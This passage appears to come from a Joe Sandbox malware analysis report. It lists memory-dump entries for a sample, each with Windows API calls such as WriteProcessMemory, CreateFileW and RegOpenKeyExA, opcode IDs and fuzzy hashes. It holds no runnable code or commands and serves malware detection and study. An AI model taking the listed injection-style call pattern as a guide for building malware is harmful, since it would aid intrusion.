                    • Instruction Fuzzy Hash: 5321687DE28297EDFF29A7715C02B792A54FB81701F24A20CB24BA50C2ED768AC15971
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00D91DFF
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: MemoryProcessWrite
                    • String ID:
                    • API String ID: 3559483778-0
                    • Opcode ID: ec60615dc82382a16c526ca4507f80c62e857d2befcbf524650c4a297530c541
                    • Instruction ID: b1502ffe1d4a3a0de27ddf189eff0f0ff8cd2d5083ef8d9958641f71ae0d9141
                    • Opcode Fuzzy Hash: ec60615dc82382a16c526ca4507f80c62e857d2befcbf524650c4a297530c541
                    • Instruction Fuzzy Hash: 56213A2D629513AEFF1777715C0293E2D99FF82715B28961CB48385082EE34C5027572
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: CreateFile
                    • String ID:
                    • API String ID: 823142352-0
                    • Opcode ID: f3c78511967c2744fde6c4839ab72bb6babc845e987d3e7224732e9e23122f51
                    • Instruction ID: 5ea81d0dea9f37141c3992e33865808cce1c9d19883c1ffb4046fc6c8afd1d44
                    • Opcode Fuzzy Hash: f3c78511967c2744fde6c4839ab72bb6babc845e987d3e7224732e9e23122f51
                    • Instruction Fuzzy Hash: 8D219E7DE18257EDFF39A7715C02B7D2A54FB80701F24A209F24BA50C2ED768AC15931
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • RegOpenKeyExA.KERNELBASE(00000000), ref: 00D9052E
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: Open
                    • String ID:
                    • API String ID: 71445658-0
                    • Opcode ID: 3c1ba6bca0e52ceb032f011902d76427b7c64e49df4b63d3e16b7c7641189c15
                    • Instruction ID: 27acba85f3dacbde58dbdfaf31e1d7c12f57a1b7782ca09944a12b364a1a75ed
                    • Opcode Fuzzy Hash: 3c1ba6bca0e52ceb032f011902d76427b7c64e49df4b63d3e16b7c7641189c15
                    • Instruction Fuzzy Hash: 51215731A1C502EDEF56A3B5AC02A3D7D55FB81709F29D42CE28397152ED35C902A972
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: CreateFile
                    • String ID:
                    • API String ID: 823142352-0
                    • Opcode ID: 775552311efc997a64fec326de64f70a324eb551f3d610af4de481991e4e8b11
                    • Instruction ID: b30ed6425882e4ecc9dd8fa4070642467d1e4242646bae63486a57243c7a5469
                    • Opcode Fuzzy Hash: 775552311efc997a64fec326de64f70a324eb551f3d610af4de481991e4e8b11
                    • Instruction Fuzzy Hash: D921AA3DE28257EDFF29A7719C42B7D2610FB80B00F24921DF25BA50C2ED768AC15931
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00D91DFF
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: MemoryProcessWrite
                    • String ID:
                    • API String ID: 3559483778-0
                    • Opcode ID: f9ac679f8e0cf96fba6a3b70f6f95253f646b93b79c71b8e224950455c4c086d
                    • Instruction ID: 9d4ca29a2bc63f01ca2b84c255c04a42c9a68dc0abd2421b07e08f6f761cac77
                    • Opcode Fuzzy Hash: f9ac679f8e0cf96fba6a3b70f6f95253f646b93b79c71b8e224950455c4c086d
                    • Instruction Fuzzy Hash: E2112B7EB29513ADFF1B73A15C12A3E3859FF81B01F64A619B583C9142EE3885027571
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: Open
                    • String ID:
                    • API String ID: 71445658-0
                    • Opcode ID: 8df296da8f6b82597c51bad57296300d3f639d263cfdb22ec6c07efedeb0fda6
                    • Instruction ID: d4a1354e1e66416bfa84846b95656911f8c443dfcd46bc42dbfb58d28d81e28b
                    • Opcode Fuzzy Hash: 8df296da8f6b82597c51bad57296300d3f639d263cfdb22ec6c07efedeb0fda6
                    • Instruction Fuzzy Hash: 61113821A1C402EDEF56A3B1BC12A3D3D15FB81709F25D42CE28397153ED25C9026972
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: CreateFile
                    • String ID:
                    • API String ID: 823142352-0
                    • Opcode ID: 09400c0ad4820e84a7cc4df27e537323eb770c818cace0aa59f055add2827039
                    • Instruction ID: 1eadaa4c7c074c0f5768637fb69d4974dff124dd53e56a2c04dfd6f662476807
                    • Opcode Fuzzy Hash: 09400c0ad4820e84a7cc4df27e537323eb770c818cace0aa59f055add2827039
                    • Instruction Fuzzy Hash: 0F21663DE18257EEEF29A7719C42B7D2654FB80700F24A219F25BA50C2ED768AC15931
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: Open
                    • String ID:
                    • API String ID: 71445658-0
                    • Opcode ID: 02a140002854169feed1287769ae2a2c964509509e6c2f63b64a68639a5e7125
                    • Instruction ID: 7809b880b899996d03464f39945d2039c0a353dcefb218389e6df31289b236d6
                    • Opcode Fuzzy Hash: 02a140002854169feed1287769ae2a2c964509509e6c2f63b64a68639a5e7125
                    • Instruction Fuzzy Hash: 11117A21D1C502EDEF56A3B1BC0263C3D14FB42319F29942CE28397153DD24CA02A8B2
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • RegOpenKeyExA.KERNELBASE(00000000), ref: 00D9052E
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: Open
                    • String ID:
                    • API String ID: 71445658-0
                    • Opcode ID: da1cf6185c91f5e603e61a7f6158a230a0e7f92a1f50f3dec993598b5eee6bac
                    • Instruction ID: 12649a696c7801eedb642bebc20fbc4587c999171b1780467f3a59941a6123ee
                    • Opcode Fuzzy Hash: da1cf6185c91f5e603e61a7f6158a230a0e7f92a1f50f3dec993598b5eee6bac
                    • Instruction Fuzzy Hash: A2114421A18512AEEF5663B4AC02A7D2E44FB91308F29C52CF283D7183DE25C9036971
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: CreateFile
                    • String ID:
                    • API String ID: 823142352-0
                    • Opcode ID: 21d50d2007dd92c12d20a00ee5866e89ac50f0f2d8dfbd3b29654133d477ed28
                    • Instruction ID: ccbb1981a8d937b3a2a2c1acf3c39e958f423bef226290f5dfe404ec04339d57
                    • Opcode Fuzzy Hash: 21d50d2007dd92c12d20a00ee5866e89ac50f0f2d8dfbd3b29654133d477ed28
                    • Instruction Fuzzy Hash: BD119C3DE18247EEEF2997719C42B7D6654FB40700F249309F24BA5081EE368AC15930
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00D91DFF
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: MemoryProcessWrite
                    • String ID:
                    • API String ID: 3559483778-0
                    • Opcode ID: 77ef553066695ffda278322379b104e7957bc83d9acadbaf098a8393b9c1341f
                    • Instruction ID: 83b6cbd5da483a459584bee90e37dd1443f4a03d4ba19d6cf83a48b8cd0d215c
                    • Opcode Fuzzy Hash: 77ef553066695ffda278322379b104e7957bc83d9acadbaf098a8393b9c1341f
                    • Instruction Fuzzy Hash: B8118E3E6195179DEF1B63719C52A3E3455FF80B01F64951DF883C9082DE38C5026631
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: CreateFile
                    • String ID:
                    • API String ID: 823142352-0
                    • Opcode ID: 67c751a8b55108762c3cb0aac3f568bf76068b188bd76126e9ed6258c285c55b
                    • Instruction ID: b02d973bb21e10dd154fd502fde1f0547e658bd3c8bff014861b56850575c949
                    • Opcode Fuzzy Hash: 67c751a8b55108762c3cb0aac3f568bf76068b188bd76126e9ed6258c285c55b
                    • Instruction Fuzzy Hash: 63116B3DE28247EDFF29A3715C02B792654FB41710F24921DB25BA5081ED378A811431
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • RegOpenKeyExA.KERNELBASE(00000000), ref: 00D9052E
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: Open
                    • String ID:
                    • API String ID: 71445658-0
                    • Opcode ID: 3b93f74d504e587c04ad082dfd367b865e42af04cd8aa33fc555d962d3ba0892
                    • Instruction ID: 6a59a9fc5522e27ee9a430cd0ed1c4dd9ecd653f9364c51b0e8d5372486fb5b9
                    • Opcode Fuzzy Hash: 3b93f74d504e587c04ad082dfd367b865e42af04cd8aa33fc555d962d3ba0892
                    • Instruction Fuzzy Hash: 05012B21A54512BDEFA673B17C02A3D1D05FB95709F25E12CF287D7193EE258A036871
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • RegOpenKeyExA.KERNELBASE(00000000), ref: 00D9052E
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: Open
                    • String ID:
                    • API String ID: 71445658-0
                    • Opcode ID: a0f65059648f58c3f2ed2e57d5ce79987266beb213469c669ee73b0f4a9396d3
                    • Instruction ID: 8b4837d3fd99e450832669a8e9f45dc5406cdea8880140ad89eb8e67a1350ce8
                    • Opcode Fuzzy Hash: a0f65059648f58c3f2ed2e57d5ce79987266beb213469c669ee73b0f4a9396d3
                    • Instruction Fuzzy Hash: 90017D21A54012BCEFA373B4BC02A3D1E05FB91319F29E118F283C6143DD258A036C72
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: CreateFile
                    • String ID:
                    • API String ID: 823142352-0
                    • Opcode ID: 77edb72f7f2b46ae724fd5b6712f3232ce1fcd22015516b3bb3acab835075a87
                    • Instruction ID: f74cbedf978ed10ba00ca60cf4396dbf940eb0e647a226987c57de11ac8f1dcd
                    • Opcode Fuzzy Hash: 77edb72f7f2b46ae724fd5b6712f3232ce1fcd22015516b3bb3acab835075a87
                    • Instruction Fuzzy Hash: 7D01943CE28243DDFF29A371AC42A3D1555FB41311B24931CF15BE5182EE37C5811431
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • CreateFileW.KERNELBASE(?,00000000,398A9A0F), ref: 00D91114
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: CreateFile
                    • String ID:
                    • API String ID: 823142352-0
                    • Opcode ID: 8f10755c4e3b35cd943f1f14528fd0ec8c7cb9d306b51c701a5feaff7733e221
                    • Instruction ID: 99f830bb0945484f9df24edb833f2d415c2d48e97a9ed6bdfb897a326922a04f
                    • Opcode Fuzzy Hash: 8f10755c4e3b35cd943f1f14528fd0ec8c7cb9d306b51c701a5feaff7733e221
                    • Instruction Fuzzy Hash: D001C03DE28383EDEF2993715C019392E14FB81300B249209F197D50C3ED36C6411531
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • RegOpenKeyExA.KERNELBASE(00000000), ref: 00D9052E
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: Open
                    • String ID:
                    • API String ID: 71445658-0
                    • Opcode ID: 96162bf4c3a3e7afa834e70640d5b40bd64f996c8d8071937c8ec1f1f0623c18
                    • Instruction ID: 554b70455bd16b1969e3597a8a58efc41ae42ac7dabcb742efbb88345bdc1b0e
                    • Opcode Fuzzy Hash: 96162bf4c3a3e7afa834e70640d5b40bd64f996c8d8071937c8ec1f1f0623c18
                    • Instruction Fuzzy Hash: 6FF02B11A14451BDFF96B3B57C0297D1D19EB82305B16A12CE143C7143DD158A031C72
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • CreateFileW.KERNELBASE(?,00000000,398A9A0F), ref: 00D91114
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: CreateFile
                    • String ID:
                    • API String ID: 823142352-0
                    • Opcode ID: f3230fbf61f6e0d9014828d3481ba37165ae35ba5a217118e601344dbf9f54e3
                    • Instruction ID: fcd5261e25ab6573ae6952080a73d5e4a747682691c21f8bdee91364e5a1548e
                    • Opcode Fuzzy Hash: f3230fbf61f6e0d9014828d3481ba37165ae35ba5a217118e601344dbf9f54e3
                    • Instruction Fuzzy Hash: 27F0F62CE29653ADEF29A7712C429391855FB81715B349708B147E50C2EE3AC6422431
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • RegOpenKeyExA.KERNELBASE(00000000), ref: 00D9052E
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: Open
                    • String ID:
                    • API String ID: 71445658-0
                    • Opcode ID: baf21cfd23433194dd69e73abd46c16f2c74aefdaf863e3f807c3351c79a3420
                    • Instruction ID: 78d0ad3cef9ec68bc05eff9dd84d80089236b65bafe781a1ecbbce56ff707d6b
                    • Opcode Fuzzy Hash: baf21cfd23433194dd69e73abd46c16f2c74aefdaf863e3f807c3351c79a3420
                    • Instruction Fuzzy Hash: 8FF02761A44411BCFFA2B3F5BC02A7D1D1AEB91309B26A128E153C7183CE258A032C72
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • CreateFileW.KERNELBASE(?,00000000,398A9A0F), ref: 00D91114
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: CreateFile
                    • String ID:
                    • API String ID: 823142352-0
                    • Opcode ID: ffe739957d8aee659d93a4557b79e1840c92414a55c47c2ea4f43bc571cfae4e
                    • Instruction ID: 904609fcc867e9bf967fd72e7277832c4bd8ba92a518f07f238b6b274fe4d642
                    • Opcode Fuzzy Hash: ffe739957d8aee659d93a4557b79e1840c92414a55c47c2ea4f43bc571cfae4e
                    • Instruction Fuzzy Hash: DDF02E2DE39283FDEF29A3726C0257D1D45BBC2355B24D709B157A00C2ED37C6426432
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • ReadFile.KERNELBASE(?,?,?,?,?), ref: 00D9137C
                    • FindCloseChangeNotification.KERNELBASE ref: 00D91419
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: ChangeCloseFileFindNotificationRead
                    • String ID:
                    • API String ID: 1200561807-0
                    • Opcode ID: 8d7be45794c9a5e24aa98d82897472a35a5572ac2451a5782ead3191aff66ef7
                    • Instruction ID: 1ec085f248a51c9fdc477098f8a7b4f5bc1d57d41f15b417c4d9d7608bd59065
                    • Opcode Fuzzy Hash: 8d7be45794c9a5e24aa98d82897472a35a5572ac2451a5782ead3191aff66ef7
                    • Instruction Fuzzy Hash: FCE0201D624842ACBF2673B12D1393D1C6DFBC3705324A648A14384943CD2586023472
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • CreateFileW.KERNELBASE(?,00000000,398A9A0F), ref: 00D91114
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: CreateFile
                    • String ID:
                    • API String ID: 823142352-0
                    • Opcode ID: d04169a8507aa7b32e6d37faf1dc935d4416816b03ff0f492e5d5591e96265b0
                    • Instruction ID: 315615b6a100756a6c5598138e9062f7c635587b4932477a6e9f8bf58c6c6a84
                    • Opcode Fuzzy Hash: d04169a8507aa7b32e6d37faf1dc935d4416816b03ff0f492e5d5591e96265b0
                    • Instruction Fuzzy Hash: CCE0612DF24513BDEF19E3722C0287E1C15AEC2715715670CE113E01C2ED38C7051472
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • CreateFileW.KERNELBASE(?,00000000,398A9A0F), ref: 00D91114
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: CreateFile
                    • String ID:
                    • API String ID: 823142352-0
                    • Opcode ID: c1e8bde57aee020fc9c60378a3bfaf65363eb9432a64a9b0c489f9f69b63b323
                    • Instruction ID: 719bdbae5797ad2bc832b81b9eeadaea497e7b52838ed5fdf65abb50d72a8418
                    • Opcode Fuzzy Hash: c1e8bde57aee020fc9c60378a3bfaf65363eb9432a64a9b0c489f9f69b63b323
                    • Instruction Fuzzy Hash: 05E0866DF14513ADAF29E3B16C0257E191AAAC1719725A709E213E41C1EE38C7012472
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: ExitProcess
                    • String ID:
                    • API String ID: 621844428-0
                    • Opcode ID: 5ce89155a9d0d642553cd5d1d691cc82c29113df743b0b59486fa57b36f6d429
                    • Instruction ID: d53d90acbd9a3053706218b4bff7e84089da96c78f7bfd75803ff1c144cf0bc0
                    • Opcode Fuzzy Hash: 5ce89155a9d0d642553cd5d1d691cc82c29113df743b0b59486fa57b36f6d429
                    • Instruction Fuzzy Hash: 93D05B526544017C2F5572713C1343D0C09A5D0737312A3096163842C6EC2846012076
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • ReadFile.KERNELBASE(?,?,?,?,?), ref: 00D9137C
                    • FindCloseChangeNotification.KERNELBASE ref: 00D91419
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: ChangeCloseFileFindNotificationRead
                    • String ID:
                    • API String ID: 1200561807-0
                    • Opcode ID: 53f2ba922466132cbb0b76afe212b52718d022069b773bc82a210bf8672d787c
                    • Instruction ID: 3d553867ee8fbd7fcaf8e5302e77fe7539f8678ad0fd34c7de1d52fad7c39bc2
                    • Opcode Fuzzy Hash: 53f2ba922466132cbb0b76afe212b52718d022069b773bc82a210bf8672d787c
                    • Instruction Fuzzy Hash: 6BD0A73D1655525DDF1ABBB01B5303D2E25DB83715324E78DC153459E3CD2586036421
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: ExitProcess
                    • String ID:
                    • API String ID: 621844428-0
                    • Opcode ID: 57e0bf374b90b6fcecd768e28653a4ce8691a1f7236897c038de2e8a6dbd967b
                    • Instruction ID: 9e188ebc53ab9cea842c3f0ccb608902bf741ab6aaca7dfeb335c0e359e7a255
                    • Opcode Fuzzy Hash: 57e0bf374b90b6fcecd768e28653a4ce8691a1f7236897c038de2e8a6dbd967b
                    • Instruction Fuzzy Hash: B3D0C962B98811BD7FA972B12C2293E0C4AA9D171A316A119A143C814AED288A0624B7
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • ReadFile.KERNELBASE(?,?,?,?,?), ref: 00D9137C
                    • FindCloseChangeNotification.KERNELBASE ref: 00D91419
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: ChangeCloseFileFindNotificationRead
                    • String ID:
                    • API String ID: 1200561807-0
                    • Opcode ID: 16d01db0c5107b380cbd906b4d7e195e901270f65508c29fc449c5ea51d449b7
                    • Instruction ID: ded9526f06a382df4a220f9c5dfad6174bee33ceb895407b4b4b116adfdea2c5
                    • Opcode Fuzzy Hash: 16d01db0c5107b380cbd906b4d7e195e901270f65508c29fc449c5ea51d449b7
                    • Instruction Fuzzy Hash: D0D0222D124A000DDF2ABBF02B2303D2E25EB83304B20EACDC113045A3CC269B03A422
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • RegOpenKeyExA.KERNELBASE(00000000), ref: 00D9052E
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: Open
                    • String ID:
                    • API String ID: 71445658-0
                    • Opcode ID: cd313ec640d03c0afd1ac13d35e3902a6b72c2ee7a84630c48733ee02e280b7d
                    • Instruction ID: a7e04963255a547259f849264d29907397adcb133a4aa5165132c5176e07917d
                    • Opcode Fuzzy Hash: cd313ec640d03c0afd1ac13d35e3902a6b72c2ee7a84630c48733ee02e280b7d
                    • Instruction Fuzzy Hash: E8D02310C04054FDDFE381BC9C0067C3E035764340F2A4424D097C7192C902CD035D71
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • CreateFileW.KERNELBASE(?,00000000,398A9A0F), ref: 00D91114
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: CreateFile
                    • String ID:
                    • API String ID: 823142352-0
                    • Opcode ID: c68cbe7e80cc2d0bd955f4f7a5547f1a08041d3f25668557ccdd1799c90d50f7
                    • Instruction ID: 0ab8aeef29c299c1c4065135eefdaeffa420f0c6ce4d85e5daed3fb731e92c75
                    • Opcode Fuzzy Hash: c68cbe7e80cc2d0bd955f4f7a5547f1a08041d3f25668557ccdd1799c90d50f7
                    • Instruction Fuzzy Hash: 8FD0A939E1522249CF1CDAB068420BD22210B80B38B20A71DC222A20C1DE30D7020422
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: AllocVirtual
                    • String ID:
                    • API String ID: 4275171209-0
                    • Opcode ID: 213718747aa00cf834fec87a8a1e3165e1d499cdf6dc26a96c939c6725be76ee
                    • Instruction ID: fced1d188bd60a5b9f8e5b314c268060541678d219c75f653748839e7a21aa09
                    • Opcode Fuzzy Hash: 213718747aa00cf834fec87a8a1e3165e1d499cdf6dc26a96c939c6725be76ee
                    • Instruction Fuzzy Hash: C4418D3DE18213EEEF1B67F4CC41B7D29B9FF81741F298559E083A9042EE358A016975
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: Sleep
                    • String ID:
                    • API String ID: 3472027048-0
                    • Opcode ID: bd4d4b1ad84da1ffb4e851fa152b745fab45bf4bea23ce4f0b5c90c3c3cc9ce5
                    • Instruction ID: 10d98e176eb807d094b0a7c5c1623a3a168a80ddde0744ce01dc3105509e020e
                    • Opcode Fuzzy Hash: bd4d4b1ad84da1ffb4e851fa152b745fab45bf4bea23ce4f0b5c90c3c3cc9ce5
                    • Instruction Fuzzy Hash: AD411D25A28502EDEF2967F5BC12E3A2C4AFB81B11F24D91DB183D9586ED38D9016071
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: Initialize
                    • String ID:
                    • API String ID: 2538663250-0
                    • Opcode ID: 0b1c24d18696a5bdad6b6979bdd6fb1721c59d8b72c7ee121802c1c46498a521
                    • Instruction ID: 074fd546217c560449405b22f650f4d931d7210c2a9999a8a95fe488ef4244a7
                    • Opcode Fuzzy Hash: 0b1c24d18696a5bdad6b6979bdd6fb1721c59d8b72c7ee121802c1c46498a521
                    • Instruction Fuzzy Hash: 15418B36A18301EDEF05DBA4BC41F3D7EA9FF41308F29D119A087AB162DE74C9019AB1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: Sleep
                    • String ID:
                    • API String ID: 3472027048-0
                    • Opcode ID: ad651bb21791e9a7c691c5cd863c20b6a0880cca9b2228f769de18364964c4a0
                    • Instruction ID: 7c291408be1c46c16ee18671198b2e547374f02910ebb6ba490961338a7f6ecf
                    • Opcode Fuzzy Hash: ad651bb21791e9a7c691c5cd863c20b6a0880cca9b2228f769de18364964c4a0
